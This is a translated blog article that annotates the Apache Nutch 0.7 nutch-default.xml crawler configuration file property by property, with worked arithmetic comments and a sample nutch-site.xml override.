zolomon

4. Nutch 1.0: A Study of the Site and Crawler Property Configuration Files

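This article is an original work by solomon@javaeye. If you repost it, please credit the source (author solomon, link http://zolomon.iteye.com).
This series uses ikanalyzer for Chinese word segmentation; thanks to its author for the great contribution to Chinese-language Java development.
My profile: http://www.google.com/profiles/solomon.royarr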

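I finally have a free day to write something,
but the office I have been away from for a while (only a few days, really) no longer has the materials I need.
The connection here is so slow that even downloading Nutch would affect my colleagues' work,
so for now I will walk through a configuration file from an older Nutch release that I found online,
and revise this article to match Nutch 1.0 later.
My apologies to readers.
The version used here comes from http://svn.apache.org/repos/asf/lucene/nutch/branches/branch-0.7/conf/nutch-default.xml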

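Note:
This article
1) is mainly a translation (chiefly of nutch-default.xml),
2) plus my own experience using Nutch,
3) plus content from the FAQ on the official Nutch wiki, http://wiki.apache.org/nutch/FAQ,
4) combined with earlier walkthroughs of Nutch configuration files by other users.
It is made up of these four parts.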

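Two kinds of comments in this document carry my own additional explanations, which are not translation. The first kind is a note placed before a translated property; the second is an explanation placed after it. The two do not necessarily appear in pairs.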

<?xml version="1.0"?>
<?xml-stylesheet type="text/xsl" href="nutch-conf.xsl"?>






<nutch-conf>




<property>
<name>http.agent.name</name>
<value>NutchCVS</value>
<description>Our HTTP 'User-Agent' request header.</description>
</property>


<property>
<name>http.robots.agents</name>
<value>NutchCVS,Nutch,*</value>
<description>The agent strings we look for in robots.txt files. There may be several,
comma-separated, in decreasing order of precedence.</description>
</property>


<property>
<name>http.robots.403.allow</name>
<value>true</value>
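<description>Some servers return HTTP status 403 (Forbidden) when /robots.txt does not exist. This should probably mean that we may crawl the site anyway. If this property is set to false, we treat such a site as forbidden and do not crawl it.</description>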
</property>

<property>
<name>http.agent.description</name>
<value>Nutch</value>
<description>Also used in the User-Agent header: a further description of our bot. The string in this value appears in parentheses after the agent name.
</description>
</property>

<property>
<name>http.agent.url</name>
<value>http://lucene.apache.org/nutch/bot.html</value>
<description>Also used in the User-Agent header. The string in this value appears after the agent name; it is simply a URL to advertise.
</description>
</property>

<property>
<name>http.agent.email</name>
<value>nutch-agent@lucene.apache.org</value>
<description>An email address to advertise in the HTTP 'From' request header and in the User-Agent header.</description>
</property>

<property>
<name>http.agent.version</name>
<value>0.7.2</value>
<description>A version string to advertise in the User-Agent header.</description>
</property>

<property>
<name>http.timeout</name>
<value>10000</value>
<description>The default network timeout, in milliseconds.</description>
</property>

<property>
<name>http.max.delays</name>
<value>3</value>
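<description>The number of times the fetch of a page may be delayed. Each time Nutch finds that a host is busy, it waits for fetcher.server.delay. After http.max.delays such delays, it gives up on the page for this fetch.</description>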
</property>
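<!-- A rough worked example, assuming the defaults in this file
     (http.max.delays = 3, fetcher.server.delay = 5.0 seconds) and
     taking the description above at face value:
       longest wait on a busy host = 3 * 5.0 s = 15 s
     After that the page is given up on for this round. -->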

<property>
<name>http.content.limit</name>
<value>65536</value>
<description>The length limit for downloaded content, in bytes.
If this value is nonnegative (>=0), content longer than it is truncated; otherwise nothing is truncated.
</description>
</property>


<property>
<name>http.proxy.host</name>
<value></value>
<description>The proxy hostname. If empty, no proxy is used.</description>
</property>

<property>
<name>http.proxy.port</name>
<value></value>
<description>The proxy port.</description>
</property>

<property>
<name>http.verbose</name>
<value>false</value>
<description>If true, HTTP will log more verbosely.</description>
</property>


<property>
<name>http.redirect.max</name>
<value>3</value>
<description>The maximum number of redirects followed when fetching a page. If a page has more redirects than this, the fetcher gives up on it and tries the next page.</description>
</property>



<property>
<name>file.content.limit</name>
<value>65536</value>
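<description>The length limit for downloaded content, in bytes.
If this value is larger than zero, content longer than it is truncated; otherwise (zero or negative), nothing is truncated.
</description>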
</property>

<property>
<name>file.content.ignored</name>
<value>true</value>
<description>If true, no file content is stored during fetch.
This is usually what we want, since file:// URLs normally point to local files that we can fetch and index directly. Otherwise (if not true), file contents are stored.
!! NOT IMPLEMENTED YET !!
</description>
</property>



<property>
<name>ftp.username</name>
<value>anonymous</value>
<description>The ftp login username.</description>
</property>

<property>
<name>ftp.password</name>
<value>anonymous@example.com</value>
<description>The ftp login password.</description>
</property>

<property>
<name>ftp.content.limit</name>
<value>65536</value>
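<description>The length limit for file content, in bytes.
If this value is larger than zero, content longer than it is truncated; otherwise (zero or negative), nothing is truncated. Caution: the classical
ftp RFCs never defined partial transfer and, in practice, some ftp servers do not handle a forced close-down from the client side well.
We do our best to handle such situations smoothly.
</description>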
</property>

<property>
<name>ftp.timeout</name>
<value>60000</value>
<description>The default timeout for the ftp client socket, in milliseconds. Please also see the ftp.keep.connection property below.</description>
</property>

<property>
<name>ftp.server.timeout</name>
<value>100000</value>
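<description>An estimate of the ftp server idle time, in milliseconds. For many ftp servers 120000 milliseconds is typical.
It is better to be conservative here. Together with ftp.timeout, it is used to decide whether we need to delete (annihilate) the current ftp.client instance and force another ftp.client instance to start anew. This is necessary because a fetcher thread may not be able to issue its next request in time
(it may be sitting idle) before the ftp client times out or the remote server disconnects. Used only when ftp.keep.connection (see below) is true.
</description>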
</property>

<property>
<name>ftp.keep.connection</name>
<value>false</value>
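<description>Whether to keep the ftp connection open. Useful when crawling the same host again and again. When set to true, it avoids repeating the connection, login and directory-list parser setup for subsequent urls. If it is set to true, however, you must make sure (roughly) that:
(1) ftp.timeout is less than ftp.server.timeout
(2) ftp.timeout is larger than (fetcher.threads.fetch * fetcher.server.delay)
Otherwise there will be a large number of "delete client because idled too long" messages in the thread logs.</description>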
</property>
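<!-- A quick check of the two conditions, assuming the defaults in this file.
     The description does not state units for condition (2); converting
     fetcher.server.delay from seconds to milliseconds is an assumption here.
       (1) ftp.timeout 60000 ms is less than ftp.server.timeout 100000 ms: holds
       (2) fetcher.threads.fetch * fetcher.server.delay = 10 * 5.0 s = 50 s = 50000 ms,
           and ftp.timeout 60000 ms is larger than 50000 ms: holds
     So the defaults would satisfy both conditions if ftp.keep.connection were set to true. -->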

<property>
<name>ftp.follow.talk</name>
<value>false</value>
<description>Whether to log the dialogue between our client and the remote server. Useful for debugging.</description>
</property>



<property>
<name>db.default.fetch.interval</name>
<value>30</value>
<description>The default number of days between re-fetches of a page.
</description>
</property>

<property>
<name>db.ignore.internal.links</name>
<value>true</value>
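<description>If true, when adding new links to a page, links from the same host are ignored. This is an effective way to limit the size of the link database, keeping only the highest quality links.
</description>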
</property>


<property>
<name>db.score.injected</name>
<value>1.0</value>
<description>The score of new pages added by the injector.
</description>
</property>


<property>
<name>db.score.link.external</name>
<value>1.0</value>
<description>The score factor for new pages added due to a link from
another host, relative to the referencing page's score.
</description>
</property>

<property>
<name>db.score.link.internal</name>
<value>1.0</value>
<description>The score factor for pages added due to a link from the
same host, relative to the referencing page's score.
</description>
</property>

<property>
<name>db.max.outlinks.per.page</name>
<value>100</value>
<description>The maximum number of outlinks that we will process for a single page.</description>
</property>

<property>
<name>db.max.anchor.length</name>
<value>100</value>
<description>The maximum length of a link's anchor text.</description>
</property>

<property>
<name>db.fetch.retry.max</name>
<value>3</value>
<description>The maximum number of retries when fetching.</description>
</property>



<property>
<name>fetchlist.score.by.link.count</name>
<value>true</value>
<description>If true, set page scores on fetchlist entries based on
log(number of anchors), instead of using original page scores. This
results in prioritization of pages with many incoming links.
</description>
</property>



<property>
<name>fetcher.server.delay</name>
<value>5.0</value>
<description>The number of seconds the fetcher will delay between
   successive requests to the same server.</description>
</property>

<property>
<name>fetcher.threads.fetch</name>
<value>10</value>
<description>The number of fetcher threads to use at the same time.
    This also determines the maximum number of requests that are
    made at once (each FetcherThread handles one connection).</description>
</property>

<property>
<name>fetcher.threads.per.host</name>
<value>1</value>
<description>The maximum number of threads allowed to fetch from one host at the same time.</description>
</property>

<property>
<name>fetcher.verbose</name>
<value>false</value>
<description>If true, the fetcher will log more verbosely.</description>
</property>


<property>
<name>parser.threads.parse</name>
<value>10</value>
<description>The number of parser threads ParseSegment should use at the same time.</description>
</property>



<property>
<name>io.sort.factor</name>
<value>100</value>
<description>The number of streams to merge at once while sorting
files. This determines the number of open file handles.</description>
</property>

<property>
<name>io.sort.mb</name>
<value>100</value>
<description>The total amount of buffer memory to use while sorting
files, in megabytes. By default, gives each merge stream 1MB, which
should minimize seeks.</description>
</property>
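<!-- Where the "1MB per merge stream" figure comes from, assuming the defaults
     io.sort.mb = 100 and io.sort.factor = 100 in this file:
       100 MB / 100 streams = 1 MB per stream
     As an illustration only: halving io.sort.factor to 50 with io.sort.mb
     unchanged would give 100 / 50 = 2 MB per stream. -->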

<property>
<name>io.file.buffer.size</name>
<value>131072</value>
<description>The size of buffer for use in sequence files.
The size of this buffer should probably be a multiple of hardware
page size (4096 on Intel x86), and it determines how much data is
buffered during read and write operations.</description>
</property>



<property>
<name>fs.default.name</name>
<value>local</value>
<description>The name of the default file system. Either the
literal string "local" or a host:port for NDFS.</description>
</property>

<property>
<name>ndfs.name.dir</name>
<value>/tmp/nutch/ndfs/name</value>
<description>Determines where on the local filesystem the NDFS name node
      should store the name table.</description>
</property>

<property>
<name>ndfs.data.dir</name>
<value>/tmp/nutch/ndfs/data</value>
<description>Determines where on the local filesystem an NDFS data node
      should store its blocks.</description>
</property>



<property>
<name>mapred.job.tracker</name>
<value>localhost:8010</value>
<description>The host and port that the MapReduce job tracker runs at.
</description>
</property>

<property>
<name>mapred.local.dir</name>
<value>/tmp/nutch/mapred/local</value>
<description>The local directory where MapReduce stores temporary files
      related to tasks and jobs.
</description>
</property>



<property>
<name>indexer.score.power</name>
<value>0.5</value>
<description>Determines the power of link analysis scores. Each
page's boost is set to <i>score<sup>scorePower</sup></i> where
<i>score</i> is its link analysis score and <i>scorePower</i> is the
value of this parameter. This is compiled into indexes, so, when
this is changed, pages must be re-indexed for it to take
effect.</description>
</property>
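<!-- A worked example of the formula above, assuming the default
     scorePower = 0.5 (a square root); the scores are made up for illustration:
       score = 1.0   gives boost = 1.0^0.5   = 1.0
       score = 4.0   gives boost = 4.0^0.5   = 2.0
       score = 100.0 gives boost = 100.0^0.5 = 10.0
     A power below 1 therefore dampens large link analysis scores. -->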

<property>
<name>indexer.boost.by.link.count</name>
<value>true</value>
<description>When true, scores for a page are multiplied by the log of
the number of incoming links to the page.</description>
</property>

<property>
<name>indexer.max.title.length</name>
<value>100</value>
<description>The maximum number of characters of a title that are indexed.
</description>
</property>

<property>
<name>indexer.max.tokens</name>
<value>10000</value>
<description>
The maximum number of tokens that will be indexed for a single field
in a document. This limits the amount of memory required for
indexing, so that collections with very large files will not crash
the indexing process by running out of memory.

Note that this effectively truncates large documents, excluding
from the index tokens that occur further in the document. If you
know your source documents are large, be sure to set this value
high enough to accommodate the expected size. If you set it to
Integer.MAX_VALUE, then the only limit is your memory, but you
should anticipate an OutOfMemoryError.
</description>
</property>

<property>
<name>indexer.mergeFactor</name>
<value>50</value>
<description>The factor that determines the frequency of Lucene segment
merges. This must not be less than 2, higher values increase indexing
speed but lead to increased RAM usage, and increase the number of
open file handles (which may lead to "Too many open files" errors).
NOTE: the "segments" here have nothing to do with Nutch segments, they
are a low-level data unit used by Lucene.
</description>
</property>

<property>
<name>indexer.minMergeDocs</name>
<value>50</value>
<description>This number determines the minimum number of Lucene
Documents buffered in memory between Lucene segment merges. Larger
values increase indexing speed and increase RAM usage.
</description>
</property>

<property>
<name>indexer.maxMergeDocs</name>
<value>2147483647</value>
<description>This number determines the maximum number of Lucene
Documents to be merged into a new Lucene segment. Larger values
increase indexing speed and reduce the number of Lucene segments,
which reduces the number of open file handles; however, this also
increases RAM usage during indexing.
</description>
</property>

<property>
<name>indexer.termIndexInterval</name>
<value>128</value>
<description>Determines the fraction of terms which Lucene keeps in
RAM when searching, to facilitate random-access. Smaller values use
more memory but make searches somewhat faster. Larger values use
less memory but make searches somewhat slower.
</description>
</property>



<property>
<name>analysis.common.terms.file</name>
<value>common-terms.utf8</value>
<description>The name of a file containing a list of common terms
that should be indexed in n-grams.</description>
</property>



<property>
<name>searcher.dir</name>
<value>.</value>
<description>
Path to root of index directories. This directory is searched (in
order) for either the file search-servers.txt, containing a list of
distributed search servers, or the directory "index" containing
merged indexes, or the directory "segments" containing segment
indexes.
</description>
</property>

<property>
<name>searcher.filter.cache.size</name>
<value>16</value>
<description>
Maximum number of filters to cache. Filters can accelerate certain
field-based queries, like language, document format, etc. Each
filter requires one bit of RAM per page. So, with a 10 million page
index, a cache size of 16 consumes two bytes per page, or 20MB.
</description>
</property>
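<!-- The arithmetic behind the 20MB figure, using the numbers in the description:
       16 filters * 1 bit per page = 16 bits = 2 bytes per page
       2 bytes * 10,000,000 pages = 20,000,000 bytes, about 20 MB -->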

<property>
<name>searcher.filter.cache.threshold</name>
<value>0.05</value>
<description>
Filters are cached when their term is matched by more than this
fraction of pages. For example, with a threshold of 0.05, and 10
million pages, the term must match more than 1/20, or 500,000 pages.
So, if out of 10 million pages, 50% of pages are in English, and 2%
are in Finnish, then, with a threshold of 0.05, searches for
"lang:en" will use a cached filter, while searches for "lang:fi"
will score all 200,000 Finnish documents.
</description>
</property>

<property>
<name>searcher.hostgrouping.rawhits.factor</name>
<value>2.0</value>
<description>
A factor that is used to determine the number of raw hits
initially fetched, before host grouping is done.
</description>
</property>

<property>
<name>searcher.summary.context</name>
<value>5</value>
<description>
The number of context terms to display preceding and following
matching terms in a hit summary.
</description>
</property>

<property>
<name>searcher.summary.length</name>
<value>20</value>
<description>
The total number of terms to display in a hit summary.
</description>
</property>



<property>
<name>urlnormalizer.class</name>
<value>org.apache.nutch.net.BasicUrlNormalizer</value>
<description>Name of the class used to normalize URLs.</description>
</property>

<property>
<name>urlnormalizer.regex.file</name>
<value>regex-normalize.xml</value>
<description>Name of the config file used by the RegexUrlNormalizer class.</description></property>



<property>
<name>mime.types.file</name>
<value>mime-types.xml</value>
<description>Name of file in CLASSPATH containing filename extension and
magic sequence to mime types mapping information</description>
</property>

<property>
<name>mime.type.magic</name>
<value>true</value>
<description>Defines if the mime content type detector uses magic resolution.
</description>
</property>



<property>
<name>ipc.client.timeout</name>
<value>10000</value>
<description>Defines the timeout for IPC calls in milliseconds. </description>
</property>



<property>
<name>plugin.folders</name>
<value>plugins</value>
<description>Directories where nutch plugins are located. Each
element may be a relative or absolute path. If absolute, it is used
as is. If relative, it is searched for on the classpath.</description>
</property>

<property>
<name>plugin.includes</name>
<value>nutch-extensionpoints|protocol-http|urlfilter-regex|parse-(text|html)|index-basic|query-(basic|site|url)</value>
<description>Regular expression naming plugin directory names to
include. Any plugin not matching this expression is excluded.
In any case you need to include at least the nutch-extensionpoints plugin. By
default Nutch includes crawling just HTML and plain text via HTTP,
and basic indexing and search plugins.
</description>
</property>
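<!-- A sketch of extending the expression, assuming a plugin directory named
     parse-pdf exists under plugin.folders (check your own plugins directory;
     the name is used here only as an illustration):
       nutch-extensionpoints|protocol-http|urlfilter-regex|parse-(text|html|pdf)|index-basic|query-(basic|site|url)
     Because the value is a regular expression over plugin directory names,
     adding "|pdf" inside the parse-(...) group lets it match parse-pdf as well. -->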

<property>
<name>plugin.excludes</name>
<value></value>
<description>Regular expression naming plugin directory names to exclude.
</description>
</property>

<property>
<name>parser.character.encoding.default</name>
<value>windows-1252</value>
<description>The character encoding to fall back to when no other information
is available</description>
</property>

<property>
<name>parser.html.impl</name>
<value>neko</value>
<description>HTML Parser implementation. Currently the following keywords
are recognized: "neko" uses NekoHTML, "tagsoup" uses TagSoup.
</description>
</property>



<property>
<name>urlfilter.regex.file</name>
<value>regex-urlfilter.txt</value>
<description>Name of file on CLASSPATH containing regular expressions
used by urlfilter-regex (RegexURLFilter) plugin.</description>
</property>

<property>
<name>urlfilter.prefix.file</name>
<value>prefix-urlfilter.txt</value>
<description>Name of file on CLASSPATH containing url prefixes
used by urlfilter-prefix (PrefixURLFilter) plugin.</description>
</property>

<property>
<name>urlfilter.order</name>
<value></value>
<description>The order by which url filters are applied.
If empty, all available url filters (as dictated by properties
plugin-includes and plugin-excludes above) are loaded and applied in system
defined order. If not empty, only named filters are loaded and applied
in given order. For example, if this property has value:
org.apache.nutch.net.RegexURLFilter org.apache.nutch.net.PrefixURLFilter
then RegexURLFilter is applied first, and PrefixURLFilter second.
Since all filters are AND'ed, filter ordering does not have impact
on end result, but it may have performance implication, depending
on relative expensiveness of filters.
</description>
</property>



<property>
<name>extension.clustering.hits-to-cluster</name>
<value>100</value>
<description>Number of snippets retrieved for the clustering extension
if clustering extension is available and user requested results
to be clustered.</description>
</property>

<property>
<name>extension.clustering.extension-name</name>
<value></value>
<description>Use the specified online clustering extension. If empty,
the first available extension will be used. The "name" here refers to an 'id'
attribute of the 'implementation' element in the plugin descriptor XML
file.</description>
</property>



<property>
<name>extension.ontology.extension-name</name>
<value></value>
<description>Use the specified online ontology extension. If empty,
the first available extension will be used. The "name" here refers to an 'id'
attribute of the 'implementation' element in the plugin descriptor XML
file.</description>
</property>

<property>
<name>extension.ontology.urls</name>
<value>
</value>
<description>Urls of owl files, separated by spaces, such as
http://www.example.com/ontology/time.owl
http://www.example.com/ontology/space.owl
http://www.example.com/ontology/wine.owl
Or
file:/ontology/time.owl
file:/ontology/space.owl
file:/ontology/wine.owl
You have to make sure each url is valid.
By default, there is no owl file, so query refinement based on ontology
is silently ignored.
</description>
</property>



<property>
<name>query.url.boost</name>
<value>4.0</value>
<description> Used as a boost for url field in Lucene query.
</description>
</property>

<property>
<name>query.anchor.boost</name>
<value>2.0</value>
<description> Used as a boost for anchor field in Lucene query.
</description>
</property>

<property>
<name>query.title.boost</name>
<value>1.5</value>
<description> Used as a boost for title field in Lucene query.
</description>
</property>

<property>
<name>query.host.boost</name>
<value>2.0</value>
<description> Used as a boost for host field in Lucene query.
</description>
</property>

<property>
<name>query.phrase.boost</name>
<value>1.0</value>
<description> Used as a boost for phrase in Lucene query.
Multiplied by boost for field phrase is matched in.
</description>
</property>



<property>
<name>lang.ngram.min.length</name>
<value>1</value>
<description> The minimum size of ngrams to use to identify
language (must be between 1 and lang.ngram.max.length).
The larger the range between lang.ngram.min.length and
lang.ngram.max.length, the better the identification, but
the slower it is.
</description>
</property>

<property>
<name>lang.ngram.max.length</name>
<value>4</value>
<description> The maximum size of ngrams to use to identify
language (must be between lang.ngram.min.length and 4).
The larger the range between lang.ngram.min.length and
lang.ngram.max.length, the better the identification, but
the slower it is.
</description>
</property>

<property>
<name>lang.analyze.max.length</name>
<value>2048</value>
<description> The maximum number of bytes of data to use to identify
the language (0 means full content analysis).
The larger this value, the better the analysis, but the
slower it is.
</description>
</property>

</nutch-conf>
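
To change any of the defaults above, the usual approach is to leave nutch-default.xml untouched and put overrides in a separate site file. A minimal sketch follows, assuming the override file is conf/nutch-site.xml and uses the same nutch-conf root element as this 0.7-era listing. The agent name, URL, email address, and the raised content limit are hypothetical placeholders, not values from the original.

```xml
<?xml version="1.0"?>
<!-- Hypothetical site overrides; every value below is a placeholder. -->
<nutch-conf>

<property>
<name>http.agent.name</name>
<value>MyCrawler</value>
</property>

<property>
<name>http.agent.url</name>
<value>http://www.example.com/bot.html</value>
</property>

<property>
<name>http.agent.email</name>
<value>crawler-admin@example.com</value>
</property>

<!-- Raise the per-page download limit from 65536 to 262144 bytes (illustrative). -->
<property>
<name>http.content.limit</name>
<value>262144</value>
</property>

</nutch-conf>
```

Properties that are not listed in the site file keep the defaults shown in the listing above.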
